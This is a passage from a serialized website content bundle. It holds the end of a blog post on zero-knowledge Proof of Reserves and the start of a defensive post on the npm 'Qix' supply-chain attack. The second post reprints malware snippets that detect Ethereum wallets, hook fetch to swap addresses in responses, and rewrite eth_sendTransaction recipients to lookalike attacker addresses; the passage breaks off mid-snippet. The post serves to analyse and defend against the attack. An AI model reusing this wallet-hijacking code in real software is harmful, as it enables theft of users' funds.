information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Asset prices was rounded by some decimals, verify if they are close enough to the original price\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset prices-----\nBTC: US$ 95000\nETH: US$ 2402.48\n...\n======================\n",[103880],{"type":24,"tag":145,"props":103881,"children":103882},{"__ignoreMap":7},[103883],{"type":30,"value":103878},{"type":24,"tag":32,"props":103885,"children":103886},{},[103887],{"type":30,"value":103888},"When verification is completed, and all proofs are valid, the system will print the summed balances of each asset. These are the liabilities of the exchange, which you can use to check if they have reserves to cover it.",{"type":24,"tag":291,"props":103890,"children":103892},{"code":103891},"[!] Rebuilding root circuit... This might take several minutes...\n[+] Root circuit rebuilt successfully!\n[!] Verifying final proof...\n[+] Proof is valid!\n[!] Verifying asset prices...\n[+] Asset prices are valid!\n[!] Verifying asset decimals...\n[+] Asset decimals are valid!\n[!] Verifying merkle tree root hash...\n[+] Merkle tree root hash is valid!\n[!] Verifying merkle tree...\n[+] Merkle tree is valid!\n\n[!] The following information is the final needed asset reserves, which was validated by the Zero-Knowledge proof\n[!] NOTE: This is not real-time information, the information is relative to the time of the proof generation\n[!] NOTE2: We cannot guarantee that all users were included in the proof, but you can check if you were included by verifying the inclusion proof\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset reserves-----\nBTC: 1.2\nETH: 5.4\n...\n======================\n\n[+] All proofs are valid!\n[+] Finished in 4.455745214s!\n",[103893],{"type":24,"tag":145,"props":103894,"children":103895},{"__ignoreMap":7},[103896],{"type":30,"value":103891},{"type":24,"tag":43,"props":103898,"children":103899},{"id":9652},[103900],{"type":30,"value":9655},{"type":24,"tag":32,"props":103902,"children":103903},{},[103904],{"type":30,"value":103905},"In conclusion, Proof of Reserves serves as a crucial mechanism for crypto platforms, enabling them to demonstrate solvency and gain user trust in a transparent manner. By employing zero-knowledge proofs, platforms can achieve this transparency without exposing sensitive user data, effectively proving total liabilities and ensuring non-negativity while preserving privacy. Our system further refines this process, boosting efficiency and eliminating the need for manual verification.",{"type":24,"tag":32,"props":103907,"children":103908},{},[103909,103911,103917],{"type":30,"value":103910},"We are currently working with Backpack to implement this algorithm ",{"type":24,"tag":188,"props":103912,"children":103914},{"href":103726,"rel":103913},[192],[103915],{"type":30,"value":103916},"in production",{"type":30,"value":103918}," to generate and verify proofs every 24 hours. This marks a significant advancement toward establishing a real-time Proof of Reserves system, particularly given that it offers increased transparency, which is a step forward in reducing the need for external audit companies, as users will be able to verify everything themselves.",{"type":24,"tag":32,"props":103920,"children":103921},{},[103922,103924,103931],{"type":30,"value":103923},"For more information about how Backpack Exchange implements Proof of Reserves in practice, you can read their detailed article: ",{"type":24,"tag":188,"props":103925,"children":103928},{"href":103926,"rel":103927},"https://learn.backpack.exchange/articles/proof-of-reserves-at-backpack",[192],[103929],{"type":30,"value":103930},"Proof of Reserves at Backpack Exchange: Real Transparency, ZK Verified",{"type":30,"value":206},{"title":7,"searchDepth":320,"depth":320,"links":103933},[103934,103935,103936,103937,103940,103945,103949,103950,103954],{"id":99184,"depth":320,"text":99187},{"id":99265,"depth":320,"text":99268},{"id":99335,"depth":320,"text":99338},{"id":99389,"depth":320,"text":99392,"children":103938},[103939],{"id":99468,"depth":335,"text":99471},{"id":99556,"depth":320,"text":99559,"children":103941},[103942,103943,103944],{"id":99629,"depth":335,"text":99632},{"id":100100,"depth":335,"text":100103},{"id":101839,"depth":335,"text":101842},{"id":103418,"depth":320,"text":103421,"children":103946},[103947,103948],{"id":16088,"depth":335,"text":103426},{"id":103480,"depth":335,"text":103483},{"id":103610,"depth":320,"text":103613},{"id":103741,"depth":320,"text":103744,"children":103951},[103952,103953],{"id":103752,"depth":335,"text":103755},{"id":103820,"depth":335,"text":103823},{"id":9652,"depth":320,"text":9655},"content:blog:2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds.md","blog/2025-08-27-how-proof-of-reserves-uses-zk-to-protect-your-funds",{"_path":103959,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":103960,"description":103961,"date":103962,"author":37956,"image":103963,"isFeatured":16,"onBlogPage":16,"tags":103965,"body":103968,"_type":9700,"_id":106394,"_source":9702,"_file":106395,"_stem":106396,"_extension":9705},"/blog/2025-09-13-how-to-survive-supply-chain-attacks","How to Survive Supply-Chain Attacks","The recent supply-chain attack on NPM showed how easily trusted dependencies can become delivery vectors for malware. Learn how the attack worked and practical defenses developers can implement to stay safe.","2025-09-13T12:00:00.000Z",{"src":103964,"width":14,"height":15},"/posts/supply-chain-attcks/title.png",[103966,103967],"npm","supply-chain",{"type":21,"children":103969,"toc":106377},[103970,103983,103988,103993,103999,104004,104012,104342,104350,104913,104921,105628,105634,105639,105645,105650,105655,105661,105666,105678,105683,105709,105796,105808,105833,105849,105854,105859,106065,106107,106112,106124,106130,106142,106184,106197,106277,106289,106302,106309,106320,106328,106334,106347,106352,106356,106361,106373],{"type":24,"tag":32,"props":103971,"children":103972},{},[103973,103975,103981],{"type":30,"value":103974},"The recent supply-chain attack on NPM sent shockwaves through the developer community and served as a stark reminder of the risks lurking within our dependencies. Malicious versions of widely used packages, including ",{"type":24,"tag":145,"props":103976,"children":103978},{"className":103977},[],[103979],{"type":30,"value":103980},"chalk",{"type":30,"value":103982},", were published containing sophisticated malware designed to steal cryptocurrency.",{"type":24,"tag":32,"props":103984,"children":103985},{},[103986],{"type":30,"value":103987},"This attack highlights a fundamental vulnerability in the open-source ecosystem: any package you install gets the same permissions as your own code, giving it a free pass to important resources such as cookies and the network stack.",{"type":24,"tag":32,"props":103989,"children":103990},{},[103991],{"type":30,"value":103992},"In this post, we'll break down how the malware worked and outline practical defenses developers can use, including Lavamoat, a tool already adopted by leaders in the web3 ecosystem.",{"type":24,"tag":43,"props":103994,"children":103996},{"id":103995},"qix-malware-how-it-worked",[103997],{"type":30,"value":103998},"Qix Malware: How It Worked",{"type":24,"tag":32,"props":104000,"children":104001},{},[104002],{"type":30,"value":104003},"The attacker published modified versions of packages with code designed to do three things:",{"type":24,"tag":6246,"props":104005,"children":104006},{},[104007],{"type":24,"tag":2659,"props":104008,"children":104009},{},[104010],{"type":30,"value":104011},"Detect crypto wallets: The malware checked for Ethereum wallets like MetaMask.",{"type":24,"tag":291,"props":104013,"children":104015},{"code":104014,"language":38121,"meta":7,"className":38119,"style":7},"async function checkethereumw() {\n try {\n const _0x124ed3 = await window.ethereum.request({\n 'method': \"eth_accounts\"\n });\n if (_0x124ed3.length > 0) {\n runmask();\n if (rund != 1) {\n rund = 1;\n neth = 1;\n newdlocal();\n }\n } else if (rund != 1) {\n rund = 1;\n newdlocal();\n }\n }\n}\n",[104016],{"type":24,"tag":145,"props":104017,"children":104018},{"__ignoreMap":7},[104019,104039,104051,104095,104112,104119,104155,104167,104195,104215,104235,104247,104254,104289,104309,104321,104328,104335],{"type":24,"tag":301,"props":104020,"children":104021},{"class":303,"line":304},[104022,104026,104030,104035],{"type":24,"tag":301,"props":104023,"children":104024},{"style":348},[104025],{"type":30,"value":4919},{"type":24,"tag":301,"props":104027,"children":104028},{"style":348},[104029],{"type":30,"value":44953},{"type":24,"tag":301,"props":104031,"children":104032},{"style":314},[104033],{"type":30,"value":104034}," checkethereumw",{"type":24,"tag":301,"props":104036,"children":104037},{"style":359},[104038],{"type":30,"value":3883},{"type":24,"tag":301,"props":104040,"children":104041},{"class":303,"line":320},[104042,104047],{"type":24,"tag":301,"props":104043,"children":104044},{"style":308},[104045],{"type":30,"value":104046}," try",{"type":24,"tag":301,"props":104048,"children":104049},{"style":359},[104050],{"type":30,"value":3035},{"type":24,"tag":301,"props":104052,"children":104053},{"class":303,"line":335},[104054,104058,104063,104067,104071,104075,104079,104083,104087,104091],{"type":24,"tag":301,"props":104055,"children":104056},{"style":348},[104057],{"type":30,"value":58393},{"type":24,"tag":301,"props":104059,"children":104060},{"style":369},[104061],{"type":30,"value":104062}," _0x124ed3",{"type":24,"tag":301,"props":104064,"children":104065},{"style":385},[104066],{"type":30,"value":2537},{"type":24,"tag":301,"props":104068,"children":104069},{"style":308},[104070],{"type":30,"value":4617},{"type":24,"tag":301,"props":104072,"children":104073},{"style":369},[104074],{"type":30,"value":38163},{"type":24,"tag":301,"props":104076,"children":104077},{"style":359},[104078],{"type":30,"value":206},{"type":24,"tag":301,"props":104080,"children":104081},{"style":369},[104082],{"type":30,"value":38172},{"type":24,"tag":301,"props":104084,"children":104085},{"style":359},[104086],{"type":30,"value":206},{"type":24,"tag":301,"props":104088,"children":104089},{"style":314},[104090],{"type":30,"value":38247},{"type":24,"tag":301,"props":104092,"children":104093},{"style":359},[104094],{"type":30,"value":4304},{"type":24,"tag":301,"props":104096,"children":104097},{"class":303,"line":344},[104098,104103,104107],{"type":24,"tag":301,"props":104099,"children":104100},{"style":329},[104101],{"type":30,"value":104102}," 'method'",{"type":24,"tag":301,"props":104104,"children":104105},{"style":369},[104106],{"type":30,"value":1679},{"type":24,"tag":301,"props":104108,"children":104109},{"style":329},[104110],{"type":30,"value":104111}," \"eth_accounts\"\n",{"type":24,"tag":301,"props":104113,"children":104114},{"class":303,"line":401},[104115],{"type":24,"tag":301,"props":104116,"children":104117},{"style":359},[104118],{"type":30,"value":39009},{"type":24,"tag":301,"props":104120,"children":104121},{"class":303,"line":415},[104122,104126,104130,104135,104139,104143,104147,104151],{"type":24,"tag":301,"props":104123,"children":104124},{"style":308},[104125],{"type":30,"value":453},{"type":24,"tag":301,"props":104127,"children":104128},{"style":359},[104129],{"type":30,"value":873},{"type":24,"tag":301,"props":104131,"children":104132},{"style":369},[104133],{"type":30,"value":104134},"_0x124ed3",{"type":24,"tag":301,"props":104136,"children":104137},{"style":359},[104138],{"type":30,"value":206},{"type":24,"tag":301,"props":104140,"children":104141},{"style":369},[104142],{"type":30,"value":15318},{"type":24,"tag":301,"props":104144,"children":104145},{"style":385},[104146],{"type":30,"value":20986},{"type":24,"tag":301,"props":104148,"children":104149},{"style":466},[104150],{"type":30,"value":685},{"type":24,"tag":301,"props":104152,"children":104153},{"style":359},[104154],{"type":30,"value":398},{"type":24,"tag":301,"props":104156,"children":104157},{"class":303,"line":439},[104158,104163],{"type":24,"tag":301,"props":104159,"children":104160},{"style":314},[104161],{"type":30,"value":104162}," runmask",{"type":24,"tag":301,"props":104164,"children":104165},{"style":359},[104166],{"type":30,"value":4859},{"type":24,"tag":301,"props":104168,"children":104169},{"class":303,"line":447},[104170,104174,104178,104183,104187,104191],{"type":24,"tag":301,"props":104171,"children":104172},{"style":308},[104173],{"type":30,"value":2476},{"type":24,"tag":301,"props":104175,"children":104176},{"style":359},[104177],{"type":30,"value":873},{"type":24,"tag":301,"props":104179,"children":104180},{"style":369},[104181],{"type":30,"value":104182},"rund",{"type":24,"tag":301,"props":104184,"children":104185},{"style":385},[104186],{"type":30,"value":71098},{"type":24,"tag":301,"props":104188,"children":104189},{"style":466},[104190],{"type":30,"value":487},{"type":24,"tag":301,"props":104192,"children":104193},{"style":359},[104194],{"type":30,"value":398},{"type":24,"tag":301,"props":104196,"children":104197},{"class":303,"line":476},[104198,104203,104207,104211],{"type":24,"tag":301,"props":104199,"children":104200},{"style":369},[104201],{"type":30,"value":104202}," rund",{"type":24,"tag":301,"props":104204,"children":104205},{"style":385},[104206],{"type":30,"value":2537},{"type":24,"tag":301,"props":104208,"children":104209},{"style":466},[104210],{"type":30,"value":487},{"type":24,"tag":301,"props":104212,"children":104213},{"style":359},[104214],{"type":30,"value":492},{"type":24,"tag":301,"props":104216,"children":104217},{"class":303,"line":495},[104218,104223,104227,104231],{"type":24,"tag":301,"props":104219,"children":104220},{"style":369},[104221],{"type":30,"value":104222}," neth",{"type":24,"tag":301,"props":104224,"children":104225},{"style":385},[104226],{"type":30,"value":2537},{"type":24,"tag":301,"props":104228,"children":104229},{"style":466},[104230],{"type":30,"value":487},{"type":24,"tag":301,"props":104232,"children":104233},{"style":359},[104234],{"type":30,"value":492},{"type":24,"tag":301,"props":104236,"children":104237},{"class":303,"line":504},[104238,104243],{"type":24,"tag":301,"props":104239,"children":104240},{"style":314},[104241],{"type":30,"value":104242}," newdlocal",{"type":24,"tag":301,"props":104244,"children":104245},{"style":359},[104246],{"type":30,"value":4859},{"type":24,"tag":301,"props":104248,"children":104249},{"class":303,"line":512},[104250],{"type":24,"tag":301,"props":104251,"children":104252},{"style":359},[104253],{"type":30,"value":19459},{"type":24,"tag":301,"props":104255,"children":104256},{"class":303,"line":592},[104257,104261,104265,104269,104273,104277,104281,104285],{"type":24,"tag":301,"props":104258,"children":104259},{"style":359},[104260],{"type":30,"value":22565},{"type":24,"tag":301,"props":104262,"children":104263},{"style":308},[104264],{"type":30,"value":10144},{"type":24,"tag":301,"props":104266,"children":104267},{"style":308},[104268],{"type":30,"value":22574},{"type":24,"tag":301,"props":104270,"children":104271},{"style":359},[104272],{"type":30,"value":873},{"type":24,"tag":301,"props":104274,"children":104275},{"style":369},[104276],{"type":30,"value":104182},{"type":24,"tag":301,"props":104278,"children":104279},{"style":385},[104280],{"type":30,"value":71098},{"type":24,"tag":301,"props":104282,"children":104283},{"style":466},[104284],{"type":30,"value":487},{"type":24,"tag":301,"props":104286,"children":104287},{"style":359},[104288],{"type":30,"value":398},{"type":24,"tag":301,"props":104290,"children":104291},{"class":303,"line":619},[104292,104297,104301,104305],{"type":24,"tag":301,"props":104293,"children":104294},{"style":369},[104295],{"type":30,"value":104296}," rund",{"type":24,"tag":301,"props":104298,"children":104299},{"style":385},[104300],{"type":30,"value":2537},{"type":24,"tag":301,"props":104302,"children":104303},{"style":466},[104304],{"type":30,"value":487},{"type":24,"tag":301,"props":104306,"children":104307},{"style":359},[104308],{"type":30,"value":492},{"type":24,"tag":301,"props":104310,"children":104311},{"class":303,"line":635},[104312,104317],{"type":24,"tag":301,"props":104313,"children":104314},{"style":314},[104315],{"type":30,"value":104316}," newdlocal",{"type":24,"tag":301,"props":104318,"children":104319},{"style":359},[104320],{"type":30,"value":4859},{"type":24,"tag":301,"props":104322,"children":104323},{"class":303,"line":643},[104324],{"type":24,"tag":301,"props":104325,"children":104326},{"style":359},[104327],{"type":30,"value":501},{"type":24,"tag":301,"props":104329,"children":104330},{"class":303,"line":652},[104331],{"type":24,"tag":301,"props":104332,"children":104333},{"style":359},[104334],{"type":30,"value":6918},{"type":24,"tag":301,"props":104336,"children":104337},{"class":303,"line":666},[104338],{"type":24,"tag":301,"props":104339,"children":104340},{"style":359},[104341],{"type":30,"value":698},{"type":24,"tag":6246,"props":104343,"children":104344},{"start":320},[104345],{"type":24,"tag":2659,"props":104346,"children":104347},{},[104348],{"type":30,"value":104349},"Intercept HTTP requests/responses and replace blockchain addresses with the attacker's wallet: (modified code for better understanding)",{"type":24,"tag":291,"props":104351,"children":104353},{"code":104352,"language":38121,"meta":7,"className":38119,"style":7},"fetch = async function (...args) {\n const originalResponse = await originalFetch.call(this, ...args);\n const contentType = originalResponse.headers.get('Content-Type') || '';\n let data;\n if (contentType.includes('application/json')) {\n data = await originalResponse.clone().json();\n } else {\n data = await originalResponse.clone().text();\n }\n const processedData = replaceAddresses(data);\n const finalResponseText =\n typeof processedData === 'string' ? processedData : JSON.stringify(processedData);\n const finalResponse = new Response(finalResponseText, {\n status: originalResponse.status,\n statusText: originalResponse.statusText,\n headers: originalResponse.headers,\n });\n return finalResponse;\n};\n",[104354],{"type":24,"tag":145,"props":104355,"children":104356},{"__ignoreMap":7},[104357,104392,104449,104511,104526,104563,104602,104617,104656,104663,104696,104712,104771,104809,104834,104859,104883,104891,104906],{"type":24,"tag":301,"props":104358,"children":104359},{"class":303,"line":304},[104360,104364,104368,104372,104376,104380,104384,104388],{"type":24,"tag":301,"props":104361,"children":104362},{"style":314},[104363],{"type":30,"value":40843},{"type":24,"tag":301,"props":104365,"children":104366},{"style":385},[104367],{"type":30,"value":2537},{"type":24,"tag":301,"props":104369,"children":104370},{"style":348},[104371],{"type":30,"value":43107},{"type":24,"tag":301,"props":104373,"children":104374},{"style":348},[104375],{"type":30,"value":44953},{"type":24,"tag":301,"props":104377,"children":104378},{"style":359},[104379],{"type":30,"value":873},{"type":24,"tag":301,"props":104381,"children":104382},{"style":385},[104383],{"type":30,"value":4054},{"type":24,"tag":301,"props":104385,"children":104386},{"style":369},[104387],{"type":30,"value":44967},{"type":24,"tag":301,"props":104389,"children":104390},{"style":359},[104391],{"type":30,"value":398},{"type":24,"tag":301,"props":104393,"children":104394},{"class":303,"line":320},[104395,104399,104404,104408,104412,104417,104421,104425,104429,104433,104437,104441,104445],{"type":24,"tag":301,"props":104396,"children":104397},{"style":348},[104398],{"type":30,"value":42931},{"type":24,"tag":301,"props":104400,"children":104401},{"style":369},[104402],{"type":30,"value":104403}," originalResponse",{"type":24,"tag":301,"props":104405,"children":104406},{"style":385},[104407],{"type":30,"value":2537},{"type":24,"tag":301,"props":104409,"children":104410},{"style":308},[104411],{"type":30,"value":4617},{"type":24,"tag":301,"props":104413,"children":104414},{"style":369},[104415],{"type":30,"value":104416}," originalFetch",{"type":24,"tag":301,"props":104418,"children":104419},{"style":359},[104420],{"type":30,"value":206},{"type":24,"tag":301,"props":104422,"children":104423},{"style":314},[104424],{"type":30,"value":45035},{"type":24,"tag":301,"props":104426,"children":104427},{"style":359},[104428],{"type":30,"value":362},{"type":24,"tag":301,"props":104430,"children":104431},{"style":348},[104432],{"type":30,"value":8801},{"type":24,"tag":301,"props":104434,"children":104435},{"style":359},[104436],{"type":30,"value":377},{"type":24,"tag":301,"props":104438,"children":104439},{"style":385},[104440],{"type":30,"value":4054},{"type":24,"tag":301,"props":104442,"children":104443},{"style":369},[104444],{"type":30,"value":44967},{"type":24,"tag":301,"props":104446,"children":104447},{"style":359},[104448],{"type":30,"value":589},{"type":24,"tag":301,"props":104450,"children":104451},{"class":303,"line":335},[104452,104456,104461,104465,104469,104473,104478,104482,104486,104490,104495,104499,104503,104507],{"type":24,"tag":301,"props":104453,"children":104454},{"style":348},[104455],{"type":30,"value":42931},{"type":24,"tag":301,"props":104457,"children":104458},{"style":369},[104459],{"type":30,"value":104460}," contentType",{"type":24,"tag":301,"props":104462,"children":104463},{"style":385},[104464],{"type":30,"value":2537},{"type":24,"tag":301,"props":104466,"children":104467},{"style":369},[104468],{"type":30,"value":104403},{"type":24,"tag":301,"props":104470,"children":104471},{"style":359},[104472],{"type":30,"value":206},{"type":24,"tag":301,"props":104474,"children":104475},{"style":369},[104476],{"type":30,"value":104477},"headers",{"type":24,"tag":301,"props":104479,"children":104480},{"style":359},[104481],{"type":30,"value":206},{"type":24,"tag":301,"props":104483,"children":104484},{"style":314},[104485],{"type":30,"value":23138},{"type":24,"tag":301,"props":104487,"children":104488},{"style":359},[104489],{"type":30,"value":362},{"type":24,"tag":301,"props":104491,"children":104492},{"style":329},[104493],{"type":30,"value":104494},"'Content-Type'",{"type":24,"tag":301,"props":104496,"children":104497},{"style":359},[104498],{"type":30,"value":911},{"type":24,"tag":301,"props":104500,"children":104501},{"style":385},[104502],{"type":30,"value":5632},{"type":24,"tag":301,"props":104504,"children":104505},{"style":329},[104506],{"type":30,"value":38591},{"type":24,"tag":301,"props":104508,"children":104509},{"style":359},[104510],{"type":30,"value":492},{"type":24,"tag":301,"props":104512,"children":104513},{"class":303,"line":344},[104514,104518,104522],{"type":24,"tag":301,"props":104515,"children":104516},{"style":348},[104517],{"type":30,"value":14671},{"type":24,"tag":301,"props":104519,"children":104520},{"style":369},[104521],{"type":30,"value":21895},{"type":24,"tag":301,"props":104523,"children":104524},{"style":359},[104525],{"type":30,"value":492},{"type":24,"tag":301,"props":104527,"children":104528},{"class":303,"line":401},[104529,104533,104537,104542,104546,104550,104554,104559],{"type":24,"tag":301,"props":104530,"children":104531},{"style":308},[104532],{"type":30,"value":38149},{"type":24,"tag":301,"props":104534,"children":104535},{"style":359},[104536],{"type":30,"value":873},{"type":24,"tag":301,"props":104538,"children":104539},{"style":369},[104540],{"type":30,"value":104541},"contentType",{"type":24,"tag":301,"props":104543,"children":104544},{"style":359},[104545],{"type":30,"value":206},{"type":24,"tag":301,"props":104547,"children":104548},{"style":314},[104549],{"type":30,"value":41928},{"type":24,"tag":301,"props":104551,"children":104552},{"style":359},[104553],{"type":30,"value":362},{"type":24,"tag":301,"props":104555,"children":104556},{"style":329},[104557],{"type":30,"value":104558},"'application/json'",{"type":24,"tag":301,"props":104560,"children":104561},{"style":359},[104562],{"type":30,"value":41941},{"type":24,"tag":301,"props":104564,"children":104565},{"class":303,"line":415},[104566,104570,104574,104578,104582,104586,104590,104594,104598],{"type":24,"tag":301,"props":104567,"children":104568},{"style":369},[104569],{"type":30,"value":49968},{"type":24,"tag":301,"props":104571,"children":104572},{"style":385},[104573],{"type":30,"value":2537},{"type":24,"tag":301,"props":104575,"children":104576},{"style":308},[104577],{"type":30,"value":4617},{"type":24,"tag":301,"props":104579,"children":104580},{"style":369},[104581],{"type":30,"value":104403},{"type":24,"tag":301,"props":104583,"children":104584},{"style":359},[104585],{"type":30,"value":206},{"type":24,"tag":301,"props":104587,"children":104588},{"style":314},[104589],{"type":30,"value":22209},{"type":24,"tag":301,"props":104591,"children":104592},{"style":359},[104593],{"type":30,"value":36924},{"type":24,"tag":301,"props":104595,"children":104596},{"style":314},[104597],{"type":30,"value":6680},{"type":24,"tag":301,"props":104599,"children":104600},{"style":359},[104601],{"type":30,"value":4859},{"type":24,"tag":301,"props":104603,"children":104604},{"class":303,"line":439},[104605,104609,104613],{"type":24,"tag":301,"props":104606,"children":104607},{"style":359},[104608],{"type":30,"value":38222},{"type":24,"tag":301,"props":104610,"children":104611},{"style":308},[104612],{"type":30,"value":10144},{"type":24,"tag":301,"props":104614,"children":104615},{"style":359},[104616],{"type":30,"value":3035},{"type":24,"tag":301,"props":104618,"children":104619},{"class":303,"line":447},[104620,104624,104628,104632,104636,104640,104644,104648,104652],{"type":24,"tag":301,"props":104621,"children":104622},{"style":369},[104623],{"type":30,"value":49968},{"type":24,"tag":301,"props":104625,"children":104626},{"style":385},[104627],{"type":30,"value":2537},{"type":24,"tag":301,"props":104629,"children":104630},{"style":308},[104631],{"type":30,"value":4617},{"type":24,"tag":301,"props":104633,"children":104634},{"style":369},[104635],{"type":30,"value":104403},{"type":24,"tag":301,"props":104637,"children":104638},{"style":359},[104639],{"type":30,"value":206},{"type":24,"tag":301,"props":104641,"children":104642},{"style":314},[104643],{"type":30,"value":22209},{"type":24,"tag":301,"props":104645,"children":104646},{"style":359},[104647],{"type":30,"value":36924},{"type":24,"tag":301,"props":104649,"children":104650},{"style":314},[104651],{"type":30,"value":30},{"type":24,"tag":301,"props":104653,"children":104654},{"style":359},[104655],{"type":30,"value":4859},{"type":24,"tag":301,"props":104657,"children":104658},{"class":303,"line":476},[104659],{"type":24,"tag":301,"props":104660,"children":104661},{"style":359},[104662],{"type":30,"value":6918},{"type":24,"tag":301,"props":104664,"children":104665},{"class":303,"line":495},[104666,104670,104675,104679,104684,104688,104692],{"type":24,"tag":301,"props":104667,"children":104668},{"style":348},[104669],{"type":30,"value":42931},{"type":24,"tag":301,"props":104671,"children":104672},{"style":369},[104673],{"type":30,"value":104674}," processedData",{"type":24,"tag":301,"props":104676,"children":104677},{"style":385},[104678],{"type":30,"value":2537},{"type":24,"tag":301,"props":104680,"children":104681},{"style":314},[104682],{"type":30,"value":104683}," replaceAddresses",{"type":24,"tag":301,"props":104685,"children":104686},{"style":359},[104687],{"type":30,"value":362},{"type":24,"tag":301,"props":104689,"children":104690},{"style":369},[104691],{"type":30,"value":10528},{"type":24,"tag":301,"props":104693,"children":104694},{"style":359},[104695],{"type":30,"value":589},{"type":24,"tag":301,"props":104697,"children":104698},{"class":303,"line":504},[104699,104703,104708],{"type":24,"tag":301,"props":104700,"children":104701},{"style":348},[104702],{"type":30,"value":42931},{"type":24,"tag":301,"props":104704,"children":104705},{"style":369},[104706],{"type":30,"value":104707}," finalResponseText",{"type":24,"tag":301,"props":104709,"children":104710},{"style":385},[104711],{"type":30,"value":42599},{"type":24,"tag":301,"props":104713,"children":104714},{"class":303,"line":512},[104715,104720,104724,104728,104733,104738,104742,104746,104750,104754,104758,104762,104767],{"type":24,"tag":301,"props":104716,"children":104717},{"style":348},[104718],{"type":30,"value":104719}," typeof",{"type":24,"tag":301,"props":104721,"children":104722},{"style":369},[104723],{"type":30,"value":104674},{"type":24,"tag":301,"props":104725,"children":104726},{"style":385},[104727],{"type":30,"value":38177},{"type":24,"tag":301,"props":104729,"children":104730},{"style":329},[104731],{"type":30,"value":104732}," 'string'",{"type":24,"tag":301,"props":104734,"children":104735},{"style":385},[104736],{"type":30,"value":104737}," ?",{"type":24,"tag":301,"props":104739,"children":104740},{"style":369},[104741],{"type":30,"value":104674},{"type":24,"tag":301,"props":104743,"children":104744},{"style":385},[104745],{"type":30,"value":2012},{"type":24,"tag":301,"props":104747,"children":104748},{"style":369},[104749],{"type":30,"value":44267},{"type":24,"tag":301,"props":104751,"children":104752},{"style":359},[104753],{"type":30,"value":206},{"type":24,"tag":301,"props":104755,"children":104756},{"style":314},[104757],{"type":30,"value":45970},{"type":24,"tag":301,"props":104759,"children":104760},{"style":359},[104761],{"type":30,"value":362},{"type":24,"tag":301,"props":104763,"children":104764},{"style":369},[104765],{"type":30,"value":104766},"processedData",{"type":24,"tag":301,"props":104768,"children":104769},{"style":359},[104770],{"type":30,"value":589},{"type":24,"tag":301,"props":104772,"children":104773},{"class":303,"line":592},[104774,104778,104783,104787,104791,104796,104800,104805],{"type":24,"tag":301,"props":104775,"children":104776},{"style":348},[104777],{"type":30,"value":42931},{"type":24,"tag":301,"props":104779,"children":104780},{"style":369},[104781],{"type":30,"value":104782}," finalResponse",{"type":24,"tag":301,"props":104784,"children":104785},{"style":385},[104786],{"type":30,"value":2537},{"type":24,"tag":301,"props":104788,"children":104789},{"style":348},[104790],{"type":30,"value":38685},{"type":24,"tag":301,"props":104792,"children":104793},{"style":314},[104794],{"type":30,"value":104795}," Response",{"type":24,"tag":301,"props":104797,"children":104798},{"style":359},[104799],{"type":30,"value":362},{"type":24,"tag":301,"props":104801,"children":104802},{"style":369},[104803],{"type":30,"value":104804},"finalResponseText",{"type":24,"tag":301,"props":104806,"children":104807},{"style":359},[104808],{"type":30,"value":4190},{"type":24,"tag":301,"props":104810,"children":104811},{"class":303,"line":619},[104812,104817,104821,104825,104830],{"type":24,"tag":301,"props":104813,"children":104814},{"style":369},[104815],{"type":30,"value":104816}," status:",{"type":24,"tag":301,"props":104818,"children":104819},{"style":369},[104820],{"type":30,"value":104403},{"type":24,"tag":301,"props":104822,"children":104823},{"style":359},[104824],{"type":30,"value":206},{"type":24,"tag":301,"props":104826,"children":104827},{"style":369},[104828],{"type":30,"value":104829},"status",{"type":24,"tag":301,"props":104831,"children":104832},{"style":359},[104833],{"type":30,"value":1729},{"type":24,"tag":301,"props":104835,"children":104836},{"class":303,"line":635},[104837,104842,104846,104850,104855],{"type":24,"tag":301,"props":104838,"children":104839},{"style":369},[104840],{"type":30,"value":104841}," statusText:",{"type":24,"tag":301,"props":104843,"children":104844},{"style":369},[104845],{"type":30,"value":104403},{"type":24,"tag":301,"props":104847,"children":104848},{"style":359},[104849],{"type":30,"value":206},{"type":24,"tag":301,"props":104851,"children":104852},{"style":369},[104853],{"type":30,"value":104854},"statusText",{"type":24,"tag":301,"props":104856,"children":104857},{"style":359},[104858],{"type":30,"value":1729},{"type":24,"tag":301,"props":104860,"children":104861},{"class":303,"line":643},[104862,104867,104871,104875,104879],{"type":24,"tag":301,"props":104863,"children":104864},{"style":369},[104865],{"type":30,"value":104866}," headers:",{"type":24,"tag":301,"props":104868,"children":104869},{"style":369},[104870],{"type":30,"value":104403},{"type":24,"tag":301,"props":104872,"children":104873},{"style":359},[104874],{"type":30,"value":206},{"type":24,"tag":301,"props":104876,"children":104877},{"style":369},[104878],{"type":30,"value":104477},{"type":24,"tag":301,"props":104880,"children":104881},{"style":359},[104882],{"type":30,"value":1729},{"type":24,"tag":301,"props":104884,"children":104885},{"class":303,"line":652},[104886],{"type":24,"tag":301,"props":104887,"children":104888},{"style":359},[104889],{"type":30,"value":104890}," });\n",{"type":24,"tag":301,"props":104892,"children":104893},{"class":303,"line":666},[104894,104898,104902],{"type":24,"tag":301,"props":104895,"children":104896},{"style":308},[104897],{"type":30,"value":45936},{"type":24,"tag":301,"props":104899,"children":104900},{"style":369},[104901],{"type":30,"value":104782},{"type":24,"tag":301,"props":104903,"children":104904},{"style":359},[104905],{"type":30,"value":492},{"type":24,"tag":301,"props":104907,"children":104908},{"class":303,"line":674},[104909],{"type":24,"tag":301,"props":104910,"children":104911},{"style":359},[104912],{"type":30,"value":3118},{"type":24,"tag":6246,"props":104914,"children":104915},{"start":335},[104916],{"type":24,"tag":2659,"props":104917,"children":104918},{},[104919],{"type":30,"value":104920},"The malware intercepted wallet requests and silently replaced the receiver address with the attacker address. Instead of a blunt substitution, it used the Levenshtein distance algorithm to pick a lookalike address, which made it harder for victims to notice funds being siphoned.",{"type":24,"tag":291,"props":104922,"children":104924},{"code":104923,"language":38121,"meta":7,"className":38119,"style":7},"if (_0x2c3d7e.method === 'eth_sendTransaction' && _0x2c3d7e.params && _0x2c3d7e.params[0]) {\n try {\n const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true);\n _0x2c3d7e.params[0] = _0x39ad21;\n } catch (_0x226343) {}\n} else {\n if (\n (_0x2c3d7e.method === 